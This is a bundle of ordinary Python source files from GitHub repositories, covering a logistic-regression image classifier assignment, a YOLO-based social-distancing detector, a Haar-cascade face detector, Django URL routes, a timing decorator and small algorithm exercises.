str(test_set_y.shape))\r\n\r\n\r\n# To represent color images, the red, green and blue channels (RGB) must be specified for\r\n# each pixel, and so the pixel value is actually a vector of three numbers ranging from 0 to 255.\r\n\r\n# One common preprocessing step in machine learning is to center and standardize your\r\n# dataset, meaning that you substract the mean of the whole numpy array from each example,\r\n# and then divide each example by the standard deviation of the whole numpy array.\r\n# But for picture datasets, it is simpler and more convenient and works almost as well\r\n# to just divide every row of the dataset by 255 (the maximum value of a pixel channel).\r\n\r\n# Let's standardize our dataset.\r\ntrain_set_x = train_set_x_flatten / 255.\r\ntest_set_x = test_set_x_flatten / 255.\r\n\r\n# What you need to remember:\r\n\r\n# Common steps for pre-processing a new dataset are:\r\n\r\n# Figure out the dimensions and shapes of the problem (m_train, m_test, num_px, ...)\r\n# Reshape the datasets such that each example is now a vector of size (num_px * num_px * 3, 1)\r\n# \"Standardize\" the data\r\n\r\n\r\n#### Mathematical expression of the algorithm:\r\n\r\n#For one example 𝑥(𝑖):\r\n#𝑧(𝑖)=𝑤.𝑇 𝑥(𝑖)+𝑏\r\n#𝑦̂ (𝑖)=𝑎(𝑖)=𝑠𝑖𝑔𝑚𝑜𝑖𝑑(𝑧(𝑖))\r\n#L(𝑎(𝑖),𝑦(𝑖))=−𝑦(𝑖)log(𝑎(𝑖))−(1−𝑦(𝑖))log(1−𝑎(𝑖))\r\n#The cost is then computed by summing over all training examples:\r\n#J=(1/𝑚)∑𝑖=1 to 𝑚 L(𝑎(𝑖),𝑦(𝑖))\r\n\r\n#### The main steps for building a Neural Network are:\r\n\r\n# 1- Define the model structure (such as number of input features)\r\n# 2- Initialize the model's parameters\r\n# 3- Loop:\r\n# - Calculate current loss (forward propagation)\r\n# - Calculate current gradient (backward propagation)\r\n# - Update parameters (gradient descent)\r\n# You often build 1-3 separately and integrate them into one function we call model()\r\n\r\n# GRADED FUNCTION: sigmoid\r\n\r\ndef sigmoid(z):\r\n \"\"\"\r\n Compute the sigmoid of z\r\n\r\n Arguments:\r\n z -- A scalar or numpy array of any size.\r\n\r\n Return:\r\n s -- sigmoid(z)\r\n \"\"\"\r\n s = 1/(1+np.exp(-z))\r\n return s\r\n\r\n\r\n# GRADED FUNCTION: initialize_with_zeros\r\nZ=np.array([0,2])\r\nsigmoid(z)\r\n\r\n\r\ndef initialize_with_zeros(dim):\r\n \"\"\"\r\n This function creates a vector of zeros of shape (dim, 1) for w and initializes b to 0.\r\n\r\n Argument:\r\n dim -- size of the w vector we want (or number of parameters in this case)\r\n\r\n Returns:\r\n w -- initialized vector of shape (dim, 1)\r\n b -- initialized scalar (corresponds to the bias) of type float\r\n \"\"\"\r\n #w=np.zeros(dim).reshape(dim,1)\r\n w=np.array([0]*dim).reshape(dim,1)\r\n b=0.\r\n return w, b\r\n\r\ndim=2\r\ninitialize_with_zeros(dim)\r\n\r\n\r\n# GRADED FUNCTION: propagate\r\n\r\ndef propagate(w, b, X, Y):\r\n \"\"\"\r\n Implement the cost function and its gradient for the propagation explained above\r\n\r\n Arguments:\r\n w -- weights, a numpy array of size (num_px * num_px * 3, 1)\r\n b -- bias, a scalar\r\n X -- data of size (num_px * num_px * 3, number of examples)\r\n Y -- true \"label\" vector (containing 0 if non-cat, 1 if cat) of size (1, number of examples)\r\n\r\n Return:\r\n cost -- negative log-likelihood cost for logistic regression\r\n dw -- gradient of the loss with respect to w, thus same shape as w\r\n db -- gradient of the loss with respect to b, thus same shape as b\r\n\r\n Tips:\r\n - Write your code step by step for the propagation. np.log(), np.dot()\r\n \"\"\"\r\n m = X.shape[1]\r\n # FORWARD PROPAGATION (FROM X TO COST)\r\n # compute activation\r\n A = sigmoid(np.dot(w.T,X)+b)\r\n # compute cost by using np.dot to perform multiplication.\r\n # And don't use loops for the sum.\r\n cost=(-1/m)*sum(sum(((Y*np.log(A))+(((1-Y)*np.log(1-A))))))\r\n # BACKWARD PROPAGATION (TO FIND GRAD)\r\n dw =(1/m)*np.dot(X,(A-Y).T)\r\n db=1/m*sum(sum(A-Y))\r\n cost = np.squeeze(np.array(cost))\r\n grads = {\"dw\": dw,\r\n \"db\": db}\r\n return grads, cost\r\n\r\n\r\n\r\nw = np.array([[1.], [2]])\r\nb = 1.5\r\nX = np.array([[1., -2., -1.], [3., 0.5, -3.2]])\r\nY = np.array([[1, 1, 0]])\r\ngrads, cost = propagate(w, b, X, Y)\r\n\r\n\r\n#### Optimization\r\n#Write down the optimization function. The goal is to learn 𝑤 and 𝑏 by minimizing the\r\n# cost function 𝐽 . For a parameter 𝜃 , the update rule is 𝜃=𝜃−𝛼 𝑑𝜃 , where 𝛼 is the\r\n# learning rate.\r\n\r\n# GRADED FUNCTION: optimize\r\n\r\ndef optimize(w, b, X, Y, num_iterations=100, learning_rate=0.009, print_cost=False):\r\n \"\"\"\r\n This function optimizes w and b by running a gradient descent algorithm\r\n #\r\n Arguments:\r\n w -- weights, a numpy array of size (num_px * num_px * 3, 1)\r\n b -- bias, a scalar\r\n X -- data of shape (num_px * num_px * 3, number of examples)\r\n Y -- true \"label\" vector (containing 0 if non-cat, 1 if cat), of shape (1, number of examples)\r\n num_iterations -- number of iterations of the optimization loop\r\n learning_rate -- learning rate of the gradient descent update rule\r\n print_cost -- True to print the loss every 100 steps\r\n #\r\n Returns:\r\n params -- dictionary containing the weights w and bias b\r\n grads -- dictionary containing the gradients of the weights and bias with respect to the cost function\r\n costs -- list of all the costs computed during the optimization, this will be used to plot the learning curve.\r\n #\r\n Tips:\r\n You basically need to write down two steps and iterate through them:\r\n 1) Calculate the cost and the gradient for the current parameters. Use propagate().\r\n 2) Update the parameters using gradient descent rule for w and b.\r\n \"\"\"\r\n w = copy.deepcopy(w)\r\n b = copy.deepcopy(b)\r\n costs = []\r\n for i in range(num_iterations):\r\n # Cost and gradient calculation\r\n grads, cost = propagate(w,b,X,Y)\r\n # Retrieve derivatives from grads\r\n dw = grads[\"dw\"]\r\n db = grads[\"db\"]\r\n # update rule\r\n w=w-learning_rate*dw\r\n b=b-learning_rate*db\r\n # Record the costs\r\n if i % 100 == 0:\r\n costs.append(cost)\r\n # Print the cost every 100 training iterations\r\n if print_cost:\r\n print (\"Cost after iteration %i: %f\" %(i, cost))\r\n params = {\"w\": w,\r\n \"b\": b}\r\n grads = {\"dw\": dw,\r\n \"db\": db}\r\n return params, grads, costs\r\n\r\nparams, grads, costs = optimize(w, b, X, Y, num_iterations=100, learning_rate=0.009, print_cost=False)\r\n\r\n#### predict\r\n# - Calculate 𝑌̂ =𝐴=𝜎(𝑤𝑇𝑋+𝑏)\r\n# - Convert the entries of a into 0 (if activation <= 0.5) or 1 (if activation > 0.5),\r\n# stores the predictions in a vector Y_prediction. If you wish, you can use an if/else\r\n# statement in a for loop (though there is also a way to vectorize this).\r\n\r\n# GRADED FUNCTION: predict\r\n\r\ndef predict(w, b, X):\r\n '''\r\n Predict whether the label is 0 or 1 using learned logistic regression parameters (w, b)\r\n #\r\n Arguments:\r\n w -- weights, a numpy array of size (num_px * num_px * 3, 1)\r\n b -- bias, a scalar\r\n X -- data of size (num_px * num_px * 3, number of examples)\r\n #\r\n Returns:\r\n Y_prediction -- a numpy array (vector) containing all predictions (0/1) for the examples in X\r\n '''\r\n #\r\n m = X.shape[1]\r\n Y_prediction = np.zeros((1, m))\r\n w = w.reshape(X.shape[0], 1)\r\n # Compute vector \"A\" predicting the probabilities of a cat being present in the picture\r\n A =sigmoid(np.dot(w.T,X)+b)\r\n for i in range(A.shape[1]):\r\n # Convert probabilities A[0,i] to actual predictions p[0,i]\r\n if A[0, i] > 0.5 :\r\n Y_prediction[0,i] = 1\r\n else:\r\n Y_prediction[0,i] = 0\r\n return Y_prediction\r\n\r\nw = np.array([[0.1124579], [0.23106775]])\r\nb = -0.3\r\nX = np.array([[1., -1.1, -3.2],[1.2, 2., 0.1]])\r\npredict(w, b, X)\r\n#### What to remember:\r\n## You've implemented several functions that:\r\n## Initialize (w,b)\r\n##Optimize the loss iteratively to learn parameters (w,b):\r\n## Computing the cost and its gradient\r\n## Updating the parameters using gradient descent\r\n##Use the learned (w,b) to predict the labels for a given set of examples\r\n\r\n\r\n# GRADED FUNCTION: model\r\n\r\ndef model(X_train, Y_train, X_test, Y_test, num_iterations=2000, learning_rate=0.5, print_cost=False):\r\n \"\"\"\r\n Builds the logistic regression model by calling the function you've implemented previously\r\n\r\n Arguments:\r\n X_train -- training set represented by a numpy array of shape (num_px * num_px * 3, m_train)\r\n Y_train -- training labels represented by a numpy array (vector) of shape (1, m_train)\r\n X_test -- test set represented by a numpy array of shape (num_px * num_px * 3, m_test)\r\n Y_test -- test labels represented by a numpy array (vector) of shape (1, m_test)\r\n num_iterations -- hyperparameter representing the number of iterations to optimize the parameters\r\n learning_rate -- hyperparameter representing the learning rate used in the update rule of optimize()\r\n print_cost -- Set to True to print the cost every 100 iterations\r\n\r\n Returns:\r\n d -- dictionary containing information about the model.\r\n \"\"\"\r\n # initialize parameters with zeros\r\n w,b=initialize_with_zeros(X_train.shape[0])\r\n # Gradient descent\r\n # params, grads, costs = ...\r\n params, grads, costs=optimize(w, b, X_train, Y_train, num_iterations=num_iterations, learning_rate=learning_rate, print_cost=False)\r\n # Retrieve parameters w and b from dictionary \"params\"\r\n w=params['w']\r\n b=params['b']\r\n # Predict test/train set examples\r\n Y_prediction_test = predict(w,b,X_test)\r\n Y_prediction_train = predict(w,b,X_train)\r\n # Print train/test Errors\r\n if print_cost:\r\n print(\"train accuracy: {} %\".format(100 - np.mean(np.abs(Y_prediction_train - Y_train)) * 100))\r\n print(\"test accuracy: {} %\".format(100 - np.mean(np.abs(Y_prediction_test - Y_test)) * 100))\r\n d = {\"costs\": costs,\r\n \"Y_prediction_test\": Y_prediction_test,\r\n \"Y_prediction_train\" : Y_prediction_train,\r\n \"w\" : w,\r\n \"b\" : b,\r\n \"learning_rate\" : learning_rate,\r\n \"num_iterations\": num_iterations}\r\n return d\r\n\r\n# train your model\r\ndim=X.shape[0]\r\nlogistic_regression_model = model(train_set_x, train_set_y, test_set_x, test_set_y, num_iterations=2000, learning_rate=0.005, print_cost=True)\r\n\r\n# Example of a picture that was wrongly classified.\r\nindex = 8\r\nplt.imshow(test_set_x[:, index].reshape((num_px, num_px, 3)))\r\nprint (\"y = \" + str(test_set_y[0,index]) + \", you predicted that it is a \\\"\" + classes[int(logistic_regression_model['Y_prediction_test'][0,index])].decode(\"utf-8\") + \"\\\" picture.\")\r\nplt.show()\r\n\r\n#Let's also plot the cost function and the gradients.\r\n# Plot learning curve (with costs)\r\ncosts = np.squeeze(logistic_regression_model['costs'])\r\nplt.plot(costs)\r\nplt.ylabel('cost')\r\nplt.xlabel('iterations (per hundreds)')\r\nplt.title(\"Learning rate =\" + str(logistic_regression_model[\"learning_rate\"]))\r\nplt.show()\r\n#Interpretation: You can see the cost decreasing. It shows that the parameters are being\r\n# learned. However, you see that you could train the model even more on the training set.\r\n# Try to increase the number of iterations in the cell above and rerun the cells. You might\r\n# see that the training set accuracy goes up, but the test set accuracy goes down. This is\r\n# called overfitting.\r\n\r\n\r\n\r\n\r\n#Choice of learning rate\r\n#Reminder: In order for Gradient Descent to work you must choose the learning rate wisely.\r\n# The learning rate 𝛼 determines how rapidly we update the parameters. If the learning rate\r\n# is too large we may \"overshoot\" the optimal value. Similarly, if it is too small we will\r\n# need too many iterations to converge to the best values. That's why it is crucial to use\r\n# a well-tuned learning rate.\r\n\r\n#Let's compare the learning curve of our model with several choices of learning rates. Run\r\n# the cell below. This should take about 1 minute. Feel free also to try different values\r\n# than the three we have initialized the learning_rates variable to contain, and see what\r\n# happens.\r\nlearning_rates = [0.01, 0.001, 0.0001]\r\nmodels = {}\r\n\r\nfor lr in learning_rates:\r\n print (\"Training a model with learning rate: \" + str(lr))\r\n models[str(lr)] = model(train_set_x, train_set_y, test_set_x, test_set_y, num_iterations=1500, learning_rate=lr, print_cost=False)\r\n print ('\\n' + \"-------------------------------------------------------\" + '\\n')\r\n\r\nfor lr in learning_rates:\r\n plt.plot(np.squeeze(models[str(lr)][\"costs\"]), label=str(models[str(lr)][\"learning_rate\"]))\r\n\r\nplt.ylabel('cost')\r\nplt.xlabel('iterations (hundreds)')\r\n\r\nlegend = plt.legend(loc='upper center', shadow=True)\r\nframe = legend.get_frame()\r\nframe.set_facecolor('0.90')\r\nplt.show()\r\n\r\n\r\n\r\n#Interpretation:\r\n#Different learning rates give different costs and thus different predictions results.\r\n#If the learning rate is too large (0.01), the cost may oscillate up and down. It may even\r\n# diverge (though in this example, using 0.01 still eventually ends up at a good value for the cost).\r\n#A lower cost doesn't mean a better model. You have to check if there is possibly overfitting.\r\n# It happens when the training accuracy is a lot higher than the test accuracy.\r\n#In deep learning, we usually recommend that you:\r\n#Choose the learning rate that better minimizes the cost function.\r\n#If your model overfits, use other techniques to reduce overfitting.\r\n\r\n\r\n\r\n# change this to the name of your image file\r\nmy_image = \"my_image.jpg\"\r\n\r\n# We preprocess the image to fit your algorithm.\r\nfname = \"images/\" + my_image\r\nimage = np.array(Image.open(fname).resize((num_px, num_px)))\r\nplt.imshow(image)\r\nimage = image / 255.\r\nimage = image.reshape((1, num_px * num_px * 3)).T\r\nmy_predicted_image = predict(logistic_regression_model[\"w\"], logistic_regression_model[\"b\"], image)\r\n\r\nprint(\"y = \" + str(np.squeeze(my_predicted_image)) + \", your algorithm predicts a \\\"\" + classes[int(np.squeeze(my_predicted_image)),].decode(\"utf-8\") + \"\\\" picture.\")\r\n\r\n\r\n#What to remember from this assignment:\r\n\r\n#Preprocessing the dataset is important.\r\n#You implemented each function separately: initialize(), propagate(), optimize().\r\n# Then you built a model().\r\n#Tuning the learning rate (which is an example of a \"hyperparameter\") can make a big\r\n# difference to the algorithm. You will see more examples of this later in this course!\r\n","repo_name":"kiansina/ML_Neural_Networks","sub_path":"Week2/2_app_Logistic.py","file_name":"2_app_Logistic.py","file_ext":"py","file_size_in_byte":18173,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71461538154","text":"from py import social_distancing_config as config\nfrom py.map import heatmapper\nfrom py.map import flowmapper\nfrom py import pathfind\nfrom py import plot as plot_\nfrom py.detection import detect_people\nfrom scipy.spatial import distance as dist\nimport numpy as np\nimport argparse\nimport imutils\nimport cv2\nimport os\n\n# construct the argument parse and parse the arguments\nap = argparse.ArgumentParser()\nap.add_argument(\"-i\", \"--input\", type=str, default=\"\",\n help=\"path to (optional) input video file\")\nap.add_argument(\"-o\", \"--output\", type=str, default=\"\",\n help=\"path to (optional) output video file\")\nap.add_argument(\"-d\", \"--display\", type=int, default=1,\n help=\"whether or not output frame should be displayed\")\nargs = vars(ap.parse_args())\n\n# load the COCO class labels our YOLO model was trained on\nlabelsPath = os.path.sep.join([config.MODEL_PATH, \"coco.names\"])\nLABELS = open(labelsPath).read().strip().split(\"\\n\")\n# derive the paths to the YOLO weights and model configuration\nweightsPath = os.path.sep.join([config.MODEL_PATH, \"yolov3.weights\"])\nconfigPath = os.path.sep.join([config.MODEL_PATH, \"yolov3.cfg\"])\n\n# load our YOLO object detector trained on COCO dataset (80 classes)\nprint(\"[INFO] loading YOLO from disk...\")\nnet = cv2.dnn.readNetFromDarknet(configPath, weightsPath)\n# check if we are going to use GPU\nif config.USE_GPU:\n # set CUDA as the preferable backend and target\n print(\"[INFO] setting preferable backend and target to CUDA...\")\n net.setPreferableBackend(cv2.dnn.DNN_BACKEND_CUDA)\n net.setPreferableTarget(cv2.dnn.DNN_TARGET_CUDA)\n\n# determine only the *output* layer names that we need from YOLO\nln = net.getLayerNames()\nln = [ln[i[0] - 1] for i in net.getUnconnectedOutLayers()]\n\n# initialize the video stream and pointer to output video file\nprint(\"[INFO] accessing video stream...\")\nvs = cv2.VideoCapture(args[\"input\"] if args[\"input\"] else 0)\n\n# record program iteration to get average\niteration = 1\n\n# frame skipping\nframe_skip = False\n\n# plot\nplot = None\nfig = None\ninit = True\n\n# loop over the frames from the video stream\nwhile True:\n # skip one out of two frames to increase speed\n if frame_skip:\n # set frame_skip to false to not skip frame next iteration\n frame_skip = False\n continue\n else:\n # set frame_skip to true to skip frame next iteration\n frame_skip = True\n\n # this means that frame_skip will toggle true/false for every frame\n # thus skipping half the frames and making it twice as quick\n\n # read the next frame from the file\n (grabbed, frame) = vs.read()\n # if the frame was not grabbed, then we have reached the end\n # of the stream\n if not grabbed:\n break\n # resize the frame and then detect people (and only people) in it\n frame = imutils.resize(frame, width=700)\n results = detect_people(frame, net, ln,\n personIdx=LABELS.index(\"person\"))\n # initialize the set of indexes that violate the minimum social\n # distance\n violate = set()\n\n # ensure there are *at least* two people detections (required in\n # order to compute our pairwise distance maps)\n if len(results) >= 2:\n # extract all centroids from the results and compute the\n # Euclidean distances between all pairs of the centroids\n violate_centroids = np.array([r[2] for r in results])\n D = dist.cdist(violate_centroids, violate_centroids, metric=\"euclidean\")\n # loop over the upper triangular of the distance matrix\n for i in range(0, D.shape[0]):\n for j in range(i + 1, D.shape[1]):\n # check to see if the distance between any two\n # centroid pairs is less than the configured number\n # of pixels\n if D[i, j] < config.MIN_DISTANCE:\n # update our violation set with the indexes of\n # the centroid pairs\n violate.add(i)\n violate.add(j)\n\n # create groups of people\n violate_centroids = []\n non_violate_centroids = []\n\n # loop over the results\n for (i, (prob, bbox, centroid)) in enumerate(results):\n # extract the bounding box and centroid coordinates, then\n # initialize the color of the annotation\n (startX, startY, endX, endY) = bbox\n (cX, cY) = centroid\n\n color = (0, 255, 0)\n # if the index pair exists within the violation set, then\n # update the color\n\n # rescale centroids to fit final output frame\n resize_x = int((config.OUTPUT_X / frame.shape[1]) * cX)\n resize_y = int((config.OUTPUT_Y / frame.shape[0]) * cY)\n\n # if person violates social distancing\n if i in violate:\n # change bounding box color\n color = (0, 0, 255)\n\n # add person to violate list\n violate_centroids.append((resize_x, resize_y))\n else:\n # else: add person to non-violate list\n non_violate_centroids.append((resize_x, resize_y))\n\n # draw (1) a bounding box around the person and (2) the\n # centroid coordinates of the person,\n cv2.rectangle(frame, (startX, startY), (endX, endY), color, 2)\n cv2.circle(frame, (cX, cY), 5, color, 1)\n\n # get person centroids by adding violations and non-violations\n all_centroids = []\n for centroid in violate_centroids:\n all_centroids.append((centroid[0], centroid[1], True))\n for centroid in non_violate_centroids:\n all_centroids.append((centroid[0], centroid[1], False))\n\n # resize frame to output size\n frame = cv2.resize(frame, (config.OUTPUT_X, config.OUTPUT_Y))\n\n # generate heatmap using py/map/heatmapper.py\n heatmap, average = heatmapper.getMap(all_centroids, frame, iteration)\n\n # generate flowmap using py/map/flowmapper.py\n flowmap = flowmapper.getMap(all_centroids)\n\n # wait for some iterations to go by, making sure there is some data in average\n if iteration > 10:\n # get safest coords with /py/pathfind.py\n safest_centroid = pathfind.getSafestPerson(non_violate_centroids, average)\n\n # draw filled white rectangle of where the safest centroid is\n cv2.rectangle(frame, (safest_centroid[0] * config.BLOCKSIZE_X, safest_centroid[1] * config.BLOCKSIZE_Y),\n (\n (safest_centroid[0] + 1) * config.BLOCKSIZE_X,\n (safest_centroid[1] + 1) * config.BLOCKSIZE_Y),\n (252, 152, 3), -1)\n\n # pathfinding using py/pathfind.py\n path = pathfind.getPath(average, safest_centroid)\n\n # if path is ok, ie not empty\n if path is not None:\n # create empty frame with same shape as frame\n empty = np.zeros(frame.shape, np.uint8)\n # iterate over every spot\n # horizontally\n for x in range(config.ZONES_X):\n # vertically\n for y in range(config.ZONES_Y):\n # if current spot is part of the viable path\n if path[x][y] == 1:\n # draw a filled white rectangle at this specific spot\n cv2.rectangle(empty, (x * config.BLOCKSIZE_X, y * config.BLOCKSIZE_Y),\n ((x + 1) * config.BLOCKSIZE_X, (y + 1) * config.BLOCKSIZE_Y),\n (255, 255, 255), -1)\n # overlay the empty frame to the main frame\n # to have the filled white rectangles representing the path overlayed to the video footage\n frame = cv2.addWeighted(frame, 1.0, empty, 0.25, 1)\n\n # global init, plot, fig\n x, y = pathfind.findRegressionLine(path)\n # initialize the plot at the first iteration only\n if init:\n # init py/plot.py\n # returns plot and fig objects, that are now global\n # meaning that the next iterations can access them\n # to be able to update the plot everytime the loop runs\n plot, fig = plot_.init(x, y)\n # set init to false so that the next iteration\n # will update the plot instead of init\n init = False\n else:\n # update plot and get the frame along with the results\n img, results = plot_.update(x, y, plot, fig)\n # if user wants to display regression plot do so right now\n if config.SHOW_REGRESSION:\n cv2.imshow(\"plot\", img)\n\n # draw regression line onto frame\n frame = plot_.drawLine(frame, x, results)\n\n # iterate over every line generated by flowmap\n for line in flowmap:\n # draw every line onto frame\n cv2.line(heatmap, line[0], line[1], (255, 255, 255), 2)\n\n # stack frame and heatmap horizontally for displaying\n output_frame = np.hstack((frame, heatmap))\n\n # show the output frame\n cv2.imshow(\"Frame\", output_frame)\n\n # quit program if q is pressed\n key = cv2.waitKey(1) & 0xFF\n if key == ord(\"q\"):\n break\n\n # print iteration\n print(\"[INFO] frame {i}, {v} social distance violations\".format(i=iteration, v=len(violate)))\n\n # increment iteration everytime program runs\n iteration += 1\n\n# cleanup\nvs.release()\ncv2.destroyAllWindows()\n","repo_name":"ThatAquarel/SocialDistancePathfinder","sub_path":"social_distance_detector.py","file_name":"social_distance_detector.py","file_ext":"py","file_size_in_byte":9962,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"26689748722","text":"\"\"\"\n************************************************************************************************************************************************\nCódigo Python 3.x para detectar rostros en una imagen dada.\nDesarrollado por: Ing. Ronny Díaz Lopez\nUtilizamos la libreria OpenCV y el clasificador de Viola-Jones que incluye un clasificador tipo cascada de Haar.\nMartes, 07 Junio de 2022\n\nPara mayor información consulte el articulo \"OpenCV Python (Parte 1 y 2)\", publicado por mi en el \nblog de la empresa Hepyco Software en el link: https://www.hepyco.com/blog/programacion/opencv-python-parte-1-de-2/\n************************************************************************************************************************************************\n\"\"\"\n\n# Importamos las 2 librerias con las que vamos a traajar: cv2 de OpenCV y sys que nos permite ejecutar o cargar archivos desde la terminal del sistema.\nimport cv2\nimport numpy\n\n\"\"\"\nDefinimos o configuramos los valores por defecto del camino o ruta donde se encuentran los dos archivos importantes para la correcta ejecución del programa, uno es: la ruta suministrada y almacenada en la variable rutaImagen, por la misma terminal del sistema desde donde ejecutaremos nuestro programa que en este caso sera la misma raiz o carpeta donde se encuentra nuestro programa detecta_rostros.py; y la otra ruta a indicar y que se alamacena en la variable rutaClasificador, que es donde se encuentra nuestro archivo con el codigo del clasificador Haas para deteccion de rostros en este caso el clasificadorhaar_viola-jones_rostro.xml.\nEn este ejemplo la imagen de prueba o fuente se llama imagen.jpg y se encuentra en la misma ubicacion raiz de nuestro programa python.\n\n\"\"\"\n#rutaImagen = sys.argv[1]\nrutaImagen = \"imagen.jpeg\"\nrutaClasificador = \"clasificadorhaar_viola-jones_rostro.xml\"\n\n# Aqui creamos la cascada tipo haar utilizando el clasificador incorporado en la libreria OpenCV.\ncascadaRostro = cv2.CascadeClassifier(rutaClasificador)\n\n# Ahora leemos la imagen y la convertimos a tonos grises para prepararla para el clasificador viola-jones.\nimagen = cv2.imread(rutaImagen)\ngray = cv2.cvtColor(imagen, cv2.COLOR_BGR2GRAY)\n\n# Detectamos los rostros en la imagen proporcionada\nrostros = cascadaRostro.detectMultiScale(\n gray,\n scaleFactor=1.1,\n minNeighbors=5,\n minSize=(30, 30),\n maxSize=(200, 200),\n flags = cv2.CASCADE_SCALE_IMAGE\n)\n\nprint(\"Encontramos {0} rostros!\".format(len(rostros)))\n\n# Ahora dibujamos un rectangulo alrededor de los rostros detectados\nfor (x, y, w, h) in rostros:\n cv2.rectangle(imagen, (x, y), (x+w, y+h), (0, 255, 0), 2)\n\ncv2.imshow(\"Rostros Encontrados\", imagen)\ncv2.waitKey(0) # El bucle for continua mostrando los rostros detectados en la imagen hasta que se oprima cualquier tecla y se termina el programa. \ncv2.destroyAllWindows()\n","repo_name":"ronnynations21/Python-IA","sub_path":"Artificial-Intelligence/haar-viola-jones-classifier/haar-viola-jones-classifier-main/detecta_rostros.py","file_name":"detecta_rostros.py","file_ext":"py","file_size_in_byte":2841,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"19185929163","text":"from django.conf.urls import url \nfrom . import views\nfrom django.contrib.auth import views as auth_views\n\n\nurlpatterns = [\n url('^$',views.home, name='home'),\n url('signup/', auth_views.LoginView.as_view(template_name='registration/registration_form.html'),name= 'signup'),\n url('login/', auth_views.LoginView.as_view(template_name='registration/login.html'),name= 'login'),\n url('logout/', auth_views.LogoutView.as_view(template_name='auth/logout.html'), name='logout'),\n url('profile/',views.profile, name='profile'),\n url('update/',views.update_profile,name='update_profile'),\n url('add_neighbourhood/',views.add_neighbourhood,name='add_neighbourhood'),\n url('add_business/',views.add_business,name='add_business'),\n url('business/',views.business,name=\"business\"),\n url('add_post/',views.add_post,name=\"add_post\"),\n url(r'^join_neighbourhood/(?P<hood_id>\\d+)$',views.join_neighbourhood,name='join'),\n url(r'^leave_neighbourhood/(?P<hood_id>\\d+)$',views.leave_neighbourhood,name='leave'),\n url(r'^s_neighbourhood/(?P<hood_id>\\d+)$',views.s_neighbourhood,name='details'),\n]","repo_name":"owinolawrence/neighborhood","sub_path":"hood/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37439876520","text":"# from functools import wraps\r\nfrom time import time\r\n\r\n# https://dev.to/kcdchennai/python-decorator-to-measure-execution-time-54hk & ci\r\n\r\ndef timeit(func):\r\n # @wraps(func)\r\n def _timeit_wrapper(*args, **kwargs):\r\n start_time = time()\r\n result = func(*args, **kwargs)\r\n end_time = time()\r\n total_time = end_time - start_time\r\n print(\r\n # f'Function {func.__name__}{args} {kwargs} executed in {total_time:.4f} seconds')\r\n f'Function {func.__name__} executed in {total_time:.4f} seconds')\r\n return result\r\n return _timeit_wrapper\r\n\r\n\r\n# test\r\n@timeit\r\ndef _calculate_something(num):\r\n \"\"\"\r\n Simple function that returns sum of all numbers up to the square of num.\r\n \"\"\"\r\n total = sum((x for x in range(0, num**2)))\r\n return total\r\n\r\n\r\nif __name__ == '__main__':\r\n _calculate_something(10)\r\n _calculate_something(100)\r\n","repo_name":"francescoamat0/statistical_inference_testing_playground","sub_path":"execution_time_func_decorator.py","file_name":"execution_time_func_decorator.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5650145250","text":"#part1\r\nx=6\r\ny=2\r\nx>=y and (x/y)>2 \r\n\r\n#part2\r\nx=1\r\ny=0\r\nx>=2 and (x/y)>2 #if first condition if false then 2nd is automaticaly considered false called short-circuiting\r\n\r\n#part3\r\nx=6\r\ny=0\r\n#comment below line when compiling\r\n#x >=2 and (x/y)>2 #throw a runtime error because first condition is true thus evaluate 2nd which cuase runtime\r\n\r\n#solution to part3 and part2 called guardian evaluation\r\nx=6\r\ny=0 \r\nx>2 and y!=0 and (x/y)>2 #the 3rd condition is guardian evaluation placed before the term that can cause runtime\r\n\r\nx=1\r\ny=0\r\nx>=2 and y!=0 and(x/y)>2\r\n","repo_name":"qamarabbas408/Python-4-Everybody","sub_path":"1Start/short_circuit.py","file_name":"short_circuit.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"5098245933","text":"class Solution(object):\n def minWindow(self, s, t):\n \"\"\"\n :type s: str\n :type t: str\n :rtype: str\n \"\"\"\n import collections\n need, sLen, tLen = collections.Counter(t), len(s), len(t)\n left, right = 0, 0\n begin, end = None, 0\n while right < sLen:\n tLen -= need[s[right]] > 0\n need[s[right]] -= 1\n while tLen == 0:\n if begin is None or right - left < end - begin: begin, end = left, right\n need[s[left]] += 1\n if need[s[left]] > 0: tLen += 1\n left += 1\n right += 1\n return begin is not None and s[begin: end + 1] or \"\"\n\nt = Solution()\nprint(t.minWindow(\"a\", \"aa\"))","repo_name":"orangeljd/leetcode","sub_path":"MinimumWindowSubstring.py","file_name":"MinimumWindowSubstring.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11561264141","text":"#https://leetcode.com/problems/search-suggestions-system\n#def suggestedProducts(self, products: List[str], searchWord: str) -> List[List[str]]:\n\n\ndef suggestedProducts(products,search):\n products.sort()\n res=[]\n\n for i in range(len(search)):\n d=[]\n\n for product in products:\n if product[:i+1]==search[:i+1]:\n if len(d)>=3:\n break\n else:\n d.append(product)\n\n res.append(d)\n\n return res\n","repo_name":"Jerrrrry/leetcode-python-solution","sub_path":"amz/search-suggestion-system.py","file_name":"search-suggestion-system.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"3302991034","text":"import os\nimport os.path\nimport pickle\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport sklearn\nfrom sklearn.metrics import roc_auc_score\nimport torch\n\nfrom penalties import compute_rpl_loss\n\n\n\ndef abridged_auc_softmax(min_hbr, hbr, f1):\n abridged_hbr_beg = 0\n for i in range(0, len(hbr)):\n if hbr[i] >= min_hbr:\n abridged_hbr_beg = i\n break\n \n abridged_hbr_f1_auc = sklearn.metrics.auc(hbr[abridged_hbr_beg:], f1[abridged_hbr_beg:])\n print(\"Abridged w/uncert AUC with min_hbr=\" + str(min_hbr) + \": \" + str(abridged_hbr_f1_auc/(1-min_hbr)))\n \n axes = plt.gca()\n 